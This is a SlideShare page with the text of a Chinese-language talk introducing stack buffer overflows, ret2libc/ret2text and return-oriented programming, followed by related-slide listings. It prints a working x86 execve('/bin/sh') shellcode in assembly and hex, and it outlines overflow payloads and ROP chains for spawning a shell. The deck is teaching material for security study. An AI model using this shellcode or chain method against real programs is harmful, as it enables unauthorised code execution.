SlideShare uma empresa Scribd logo

ROP 輕鬆談

H
hackstuff

Demo File: http://l4ys.tw/f/rop_demo.zip 介紹從 Buffer Overflow 到 Return-Oriented Programming 的基本原理以及簡單的 ROP 攻擊代碼撰寫與利用方式

Tecnologia
1 de 82
Baixar para ler offline
ROP輕鬆談 Return Oriented Programming Easy Talk Lays @ HackStuff
Who Am I • Lays ( L4ys )! - l4ys.tw! • Reverse Engineering / Exploit! • Wargame / CTF! • HackStuff Member
Outline • Buffer Overflow! • ret2libc / ret2text! • Return Oriented Programming! • Payload & More
Buffer Overflow
Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
Buffer Overflow • 覆蓋函數返回地址! • 覆蓋 Function Pointer ! • 覆蓋其他變數
Function Call STACK ESP > ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > ret addr arg1 arg2 ... F1( arg1, arg2 ); ... push arg2 push arg1 call F1
Function Call STACK ESP > ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK ESP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK ESP > buffer EBP > prev ebp ret addr arg1 arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Function Call STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... } push ebp mov ebp, esp sub esp, 8 ...
Buffer Overflow STACK EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2 void F1( arg1, arg2 ) { char buffer[8]; ... ... } ! scanf( “%s”, buffer );
Buffer Overflow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA! AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Buffer Overflow STACK EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA
Buffer Overflow AFTER EBP-8 AAAA EBP-4 AAAA EBP > AAAA EBP+4 AAAA EBP+8 AAAA EBP+C AAAA BEFORE EBP-8 buffer EBP-4 EBP > prev ebp EBP+4 ret addr EBP+8 arg1 EBP+C arg2
Buffer Overflow AFTER ESP > AAAA AAAA EBP > AAAA AAAA AAAA AAAA ... mov esp, ebp pop ebp ret
Buffer Overflow AFTER ESP > AAAA AAAA AAAA ... mov esp, ebp pop ebp ret = POP EIP
Buffer Overflow AFTER ESP > AAAA AAAA ... mov esp, ebp pop ebp ret JMP AAAA
Buffer Overflow
Buffer Overflow • Shellcode! • 預先寫好的攻擊代碼! • in C / ASM xor %eax,%eax push %eax push $0x68732f2f push $0x6e69622f mov %esp,%ebx push %eax push %ebx mov %esp,%ecx mov $0xb,%al int $0x80 "x31xc0x50x68x2fx2fx73x68x68x2fx62x69"! "x6ex89xe3x50x53x89xe1xb0x0bxcdx80"
Buffer Overflow STACK 0xFFFFD710 AAAA ... AAAA ... AAAA 0xFFFFD71C 0xFFFFD720 0xFFFFD720 Shellcode ...
Buffer Overflow • 塞滿 Buffer ! • 覆蓋函數返回地址! • 跳轉至 Shellcode 執行 AAAAAAAAAAAA > x20xD7xFFxFF > Shellcode
Exploit Mitigation • DEP ( Data Execution Prevention )! - 禁止執行位於資料區塊上的代碼! • ASLR ( Address Space Layout Randomization )! - 記憶體位置隨機化! • Stack Guard! • 函數返回前檢查 stack 結構完整
checksec.sh • Check Security Options! • checksec.sh --file <executable-file>! • checksec.sh --proc <proc name>! http://www.trapkit.de/tools/checksec.html
DEP Data Execution Prevention
Data Execution Prevention • 資料區塊上的代碼無法執行! • [X] Stack ! • [X] Heap! • 硬體支援 ( CPU NX bit )! • 可以放 shellcode ,但不能 run STACK AAAA AAAA AAAA 0xFFFFD720 Shellcode
「世界上最遙遠的距離,不是生與死」
「而是 Shellcode 就在 Stack 上,! 你卻無法執行它。」 — DEP
ret2libc / ret2text Return to existing code
ret2libc • DEP! • [X] Stack ! • [X] Heap! • [ O ] Binary! • [ O ] Shared Library
ret2libc • Return-to-libc! • Buffer Overflow 後,覆蓋返回地址為程式中現有函數地址! • 不能 return 到 shellcode,那就 return 到現有的 code 上! • 利用 libc.so 中的函數! • 偽造堆疊結構,建立函數呼叫! • e.g. system( “/bin/sh” )
ret2libc STACK AAAA AAAA system() ret address } Buffer Target Function pointer to “/bin/sh” } Fake Frame system( “/bin/sh” )
ret2libc STACK system() ret address pointer to “/bin/sh” ret system( “/bin/sh” )
ret2libc STACK ret address pointer to “/bin/sh” system( “/bin/sh” )
ASLR Address Space Layout Randomization
ASLR • 隨機分配記憶體位置! • Stack ! • Heap! • Shared library! • VDSO! • …! • 難以預測目標函數 / shellcode 位置
ret2text • Return-to-text! • return 到程式自身 code / PLT! • 沒開啟 PIE ( Position-independent Code ) 時,! ! .text 地址固定,不受 ASLR 影響! • 泄露有用資訊,搭配 ret2libc / ROP
ret2text
ret2libc / ret2text • Return-to-libc! • 需要知道目標函數地址! • 受 ASLR 影響,需配合 Memory Leak / libc.so! • static link! • Return-to-text! • 現有 code 不一定能滿足需求
ROP Return-Oriented Programming
ROP • Exploitation! • Return to Shellcode! • Return to Functions! • Return to Gadgets
ROP • RET 到自身程式包含 RET 指令的代碼區塊上
ROP • RET 到自身程式 包含 RET 指令的代碼區塊上
ROP • Buffer Overflow AAAA… + xE5x85x04x08 • RET = POP EIP STACK AAAA AAAA AAAA AAAA • 可控的 Stack 內容 • 透過 RET 再次控制 EIP
一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! 一直 ret! ROP
Buffer Overflow to ROP Stack AAAA... 0x08040AB0 ... Overwrite ! return address
Buffer Overflow to ROP Stack AAAA... 0x08040AB0 0x08040CD0 0x08040EF0 ... Append Addresses
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... ret 0x08040AB0 xor eax, eax 0x08040AB1 ret
ROP Chain Stack 0x08040CD0 0x08040EF0 ... ... ret 0x08040CD0 inc eax 0x08040CD1 ret
ROP Chain Stack 0x08040EF0 ... ... ... ret 0x08040EF0 mov ecx, eax 0x08040EF2 ret
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... 0x08040AB0 xor eax, eax ret ! 0x08040CD0 inc eax ret ! 0x08040EF0 mov ecx, eax ret !
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
ROP Chain Stack 0x08040AB0 0x08040CD0 0x08040EF0 ... xor eax, eax ! inc eax ! mov ecx, eax ! MOV ECX, 1
Gadgets Payload
ROP • Gadgets ! • 以 ret 結尾的指令序列! • pop ebx + pop eax + ret ! • add eax, ebx + xor eax, ecx + ret! • call eax / jmp eax! • int 0x80
Operations • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • shr … + ret! • 修改 esp! • leave + ret! • 條件跳轉!
Operations • 算數 / 邏輯運算:! • add eax, ecx + ret! • xor eax, ecx + ret! • and eax, ecx + ret! • …! • 修改 esp! • leave + ret! • 條件跳轉! • 讀寫 Register / Memory 資料:! • pop eax + pop ecx + ret! • mov [eax], ecx + ret! • 調用 system call:! • int 0x80! • 呼叫函數:! • ret2libc + pop xxx + ret
Write To Register • 寫入 Register! • pop reg + ret! • pop reg + pop reg + ret! • pop reg + pop reg + pop reg + ret! • …
Write To Register • 寫入 eax 及 ebx! ! ! pop eax! ! ! pop ebx! ! ret!
Write To Register • 寫入 eax 及 ebx Stack 0x080400AB 0xAAAAAAAA 0xBBBBBBBB next gadget ret 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register Stack 0xAAAAAAAA 0xBBBBBBBB next gadget ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register • 寫入 eax 及 ebx eax = 0xAAAAAAAA Stack 0xBBBBBBBB next gadget ... ... 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret
Write To Register Stack next gadget ... ... ... eax = 0xAAAAAAAA ebx = 0xBBBBBBBB 0x080400AB pop eax 0x080400AC pop ebx 0x080400AD ret • 寫入 eax 及 ebx
Write To Memory • 寫入 Memory! • mov [reg], reg! • mov [reg+xx], reg
Write To Memory • 寫入 Memory eax = 0xAAAAAAAA ecx = 0xBBBBBBBB mov [ecx], eax! ret *0xBBBBBBBB = 0xAAAAAAAA
System Call • System Call in ROP! • sys_execve(“/bin/sh”, NULL, NULL);
System Call • sys_execve(“/bin/sh”, NULL, NULL)! • 尋找 int 0x80 指令! • 寫入 “/bin/sh” 到記憶體! • mov [reg], reg! • 設置 register! • pop reg! • eax = 11, ebx = &“/bin/sh”, ecx = 0, edx = 0
DEMO execve in ROP
ROPGadget • 以 ROPGadget 尋找 Gadget ! • ropgadget --binary ./file! • ropgadget --binary ./file --opcode! • ropgadget --binary ./file —ropchain! • pip install ropgadget https://github.com/JonathanSalwan/ROPgadget
ROPGadget https://github.com/JonathanSalwan/ROPgadget
Conclusion • ROP Payload! • Payload 撰寫難度較高 / 重複利用性低! • Bypass ASLR / DEP! • 結合其他攻擊手段! • Load Shellcode! • ret2libc
More • Sigreturn-Oriented Programming ( SROP ) ! • 利用 sigreturn system call! • 配合假造的 frame 控制 registers! • Blind ROP ( BROP )! • 在不知道程式內容的情況下實現 ROP Exploit
Q & A
RET

Recomendados

TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3Angel Boy
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitationAngel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeAngel Boy
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaionAngel Boy
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 

Recomendados

TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Binary exploitation - AIS3
Binary exploitation - AIS3Binary exploitation - AIS3
Binary exploitation - AIS3Angel Boy
 
台科逆向簡報
台科逆向簡報台科逆向簡報
台科逆向簡報耀德 蔡
 
Heap exploitation
Heap exploitationHeap exploitation
Heap exploitationAngel Boy
 
Linux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeLinux binary Exploitation - Basic knowledge
Linux binary Exploitation - Basic knowledgeAngel Boy
 
Advanced heap exploitaion
Advanced heap exploitaionAdvanced heap exploitaion
Advanced heap exploitaionAngel Boy
 
Pwning in c++ (basic)
Pwning in c++ (basic)Pwning in c++ (basic)
Pwning in c++ (basic)Angel Boy
 
Linux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowLinux Binary Exploitation - Stack buffer overflow
Linux Binary Exploitation - Stack buffer overflowAngel Boy
 
Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Angel Boy
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
Execution
ExecutionExecution
ExecutionAngel Boy
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
Performance Wins with BPF: Getting Started
Performance Wins with BPF: Getting StartedPerformance Wins with BPF: Getting Started
Performance Wins with BPF: Getting StartedBrendan Gregg
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Adrian Huang
 
逆向工程入門
逆向工程入門逆向工程入門
逆向工程入門耀德 蔡
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsoViller Hsiao
 
Physical Memory Models.pdf
Physical Memory Models.pdfPhysical Memory Models.pdf
Physical Memory Models.pdfAdrian Huang
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)Brendan Gregg
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesSatpal Parmar
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationAngel Boy
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Abhinav Chourasia, GMOB
 

Mais conteúdo relacionado

Mais procurados

Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingAngel Boy
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniqueAngel Boy
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented ProgrammingAngel Boy
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27Sheng-Hao Ma
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Angel Boy
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolveAngel Boy
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache ExploitationAngel Boy
 
Performance Wins with BPF: Getting Started
Performance Wins with BPF: Getting StartedPerformance Wins with BPF: Getting Started
Performance Wins with BPF: Getting StartedBrendan Gregg
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Adrian Huang
 
逆向工程入門
逆向工程入門逆向工程入門
逆向工程入門耀德 蔡
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsoViller Hsiao
 
Physical Memory Models.pdf
Physical Memory Models.pdfPhysical Memory Models.pdf
Physical Memory Models.pdfAdrian Huang
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)Brendan Gregg
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelAdrian Huang
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File SystemAdrian Huang
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux KernelAdrian Huang
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesSatpal Parmar
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringGeorg Schönberger
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationAngel Boy
 

Mais procurados (20)

Linux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend ProgramingLinux Binary Exploitation - Return-oritend Programing
Linux Binary Exploitation - Return-oritend Programing
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit TechniquePlay with FILE Structure - Yet Another Binary Exploit Technique
Play with FILE Structure - Yet Another Binary Exploit Technique
 
Sigreturn Oriented Programming
Sigreturn Oriented ProgrammingSigreturn Oriented Programming
Sigreturn Oriented Programming
 
NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27NTUSTxTDOH - Pwn基礎 2015/12/27
NTUSTxTDOH - Pwn基礎 2015/12/27
 
Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation Linux Binary Exploitation - Heap Exploitation
Linux Binary Exploitation - Heap Exploitation
 
Return to dlresolve
Return to dlresolveReturn to dlresolve
Return to dlresolve
 
Execution
ExecutionExecution
Execution
 
Tcache Exploitation
Tcache ExploitationTcache Exploitation
Tcache Exploitation
 
Performance Wins with BPF: Getting Started
Performance Wins with BPF: Getting StartedPerformance Wins with BPF: Getting Started
Performance Wins with BPF: Getting Started
 
Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...Process Address Space: The way to create virtual address (page table) of user...
Process Address Space: The way to create virtual address (page table) of user...
 
逆向工程入門
逆向工程入門逆向工程入門
逆向工程入門
 
twlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdsotwlkh-linux-vsyscall-and-vdso
twlkh-linux-vsyscall-and-vdso
 
Physical Memory Models.pdf
Physical Memory Models.pdfPhysical Memory Models.pdf
Physical Memory Models.pdf
 
BPF Internals (eBPF)
BPF Internals (eBPF)BPF Internals (eBPF)
BPF Internals (eBPF)
 
Reverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux KernelReverse Mapping (rmap) in Linux Kernel
Reverse Mapping (rmap) in Linux Kernel
 
Linux Kernel - Virtual File System
Linux Kernel - Virtual File SystemLinux Kernel - Virtual File System
Linux Kernel - Virtual File System
 
Slab Allocator in Linux Kernel
Slab Allocator in Linux KernelSlab Allocator in Linux Kernel
Slab Allocator in Linux Kernel
 
Debugging linux kernel tools and techniques
Debugging linux kernel tools and techniquesDebugging linux kernel tools and techniques
Debugging linux kernel tools and techniques
 
Linux Performance Profiling and Monitoring
Linux Performance Profiling and MonitoringLinux Performance Profiling and Monitoring
Linux Performance Profiling and Monitoring
 
MacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) ExploitationMacOS memory allocator (libmalloc) Exploitation
MacOS memory allocator (libmalloc) Exploitation
 

Semelhante a ROP 輕鬆談

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJapneet Singh
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Abhinav Chourasia, GMOB
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_royRoy
 
04basic Concepts
04basic Concepts04basic Concepts
04basic ConceptsZhiwen Guo
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughterQuinn Wilton
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadachecamsec
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdfhasan58964
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROPSaumil Shah
 
Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11John Wilker
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on LinuxSam Bowne
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterOguzhan Topgul
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROPMihir Shah
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredKory Kyzar
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Miguel Arroyo
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploitshughpearse
 

Semelhante a ROP 輕鬆談 (20)

Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)Return Oriented Programming (ROP chaining)
Return Oriented Programming (ROP chaining)
 
The Stack and Buffer Overflows
The Stack and Buffer OverflowsThe Stack and Buffer Overflows
The Stack and Buffer Overflows
 
20190521 pwn 101_by_roy
20190521 pwn 101_by_roy20190521 pwn 101_by_roy
20190521 pwn 101_by_roy
 
04basic Concepts
04basic Concepts04basic Concepts
04basic Concepts
 
Software to the slaughter
Software to the slaughterSoftware to the slaughter
Software to the slaughter
 
Advance ROP Attacks
Advance ROP AttacksAdvance ROP Attacks
Advance ROP Attacks
 
Basic ASM by @binaryheadache
Basic ASM by @binaryheadacheBasic ASM by @binaryheadache
Basic ASM by @binaryheadache
 
Qemu Introduction
Qemu IntroductionQemu Introduction
Qemu Introduction
 
lec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdflec15_x86procedure_4up.pdf
lec15_x86procedure_4up.pdf
 
An introduction to ROP
An introduction to ROPAn introduction to ROP
An introduction to ROP
 
Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11Cranking Floating Point Performance Up To 11
Cranking Floating Point Performance Up To 11
 
127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux127 Ch 2: Stack overflows on Linux
127 Ch 2: Stack overflows on Linux
 
Diving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow BetterDiving Into Memory Allocation to Understand Buffer Overflow Better
Diving Into Memory Allocation to Understand Buffer Overflow Better
 
Return Oriented Programming - ROP
Return Oriented Programming - ROPReturn Oriented Programming - ROP
Return Oriented Programming - ROP
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Plugins
 
Buffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly RequiredBuffer Overflows 101: Some Assembly Required
Buffer Overflows 101: Some Assembly Required
 
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
Go Go Gadget! - An Intro to Return Oriented Programming (ROP)
 
Low Level Exploits
Low Level ExploitsLow Level Exploits
Low Level Exploits
 
ROP
ROPROP
ROP
 

Mais de hackstuff

Dvwa low level
Dvwa low levelDvwa low level
Dvwa low levelhackstuff
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defencehackstuff
 
新手無痛入門Apk逆向
新手無痛入門Apk逆向新手無痛入門Apk逆向
新手無痛入門Apk逆向hackstuff
 
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺hackstuff
 
SQL injection duplicate error principle
SQL injection duplicate error principleSQL injection duplicate error principle
SQL injection duplicate error principlehackstuff
 
Android Security Development
Android Security DevelopmentAndroid Security Development
Android Security Developmenthackstuff
 
Algo/Crypto about CTF
Algo/Crypto about CTFAlgo/Crypto about CTF
Algo/Crypto about CTFhackstuff
 
調試器原理與架構
調試器原理與架構調試器原理與架構
調試器原理與架構hackstuff
 
cmd injection
cmd injectioncmd injection
cmd injectionhackstuff
 
Webshell 簡單應用
Webshell 簡單應用Webshell 簡單應用
Webshell 簡單應用hackstuff
 
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖hackstuff
 
Antivirus Bypass
Antivirus BypassAntivirus Bypass
Antivirus Bypasshackstuff
 

Mais de hackstuff (14)

Dvwa low level
Dvwa low levelDvwa low level
Dvwa low level
 
Web2.0 attack and defence
Web2.0 attack and defenceWeb2.0 attack and defence
Web2.0 attack and defence
 
Rootkit 101
Rootkit 101Rootkit 101
Rootkit 101
 
新手無痛入門Apk逆向
新手無痛入門Apk逆向新手無痛入門Apk逆向
新手無痛入門Apk逆向
 
Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺Python 網頁爬蟲由淺入淺
Python 網頁爬蟲由淺入淺
 
SQL injection duplicate error principle
SQL injection duplicate error principleSQL injection duplicate error principle
SQL injection duplicate error principle
 
Android Security Development
Android Security DevelopmentAndroid Security Development
Android Security Development
 
Algo/Crypto about CTF
Algo/Crypto about CTFAlgo/Crypto about CTF
Algo/Crypto about CTF
 
調試器原理與架構
調試器原理與架構調試器原理與架構
調試器原理與架構
 
cmd injection
cmd injectioncmd injection
cmd injection
 
Crawler
CrawlerCrawler
Crawler
 
Webshell 簡單應用
Webshell 簡單應用Webshell 簡單應用
Webshell 簡單應用
 
Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖Php lfi rfi掃盲大補帖
Php lfi rfi掃盲大補帖
 
Antivirus Bypass
Antivirus BypassAntivirus Bypass
Antivirus Bypass
 

Último

Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
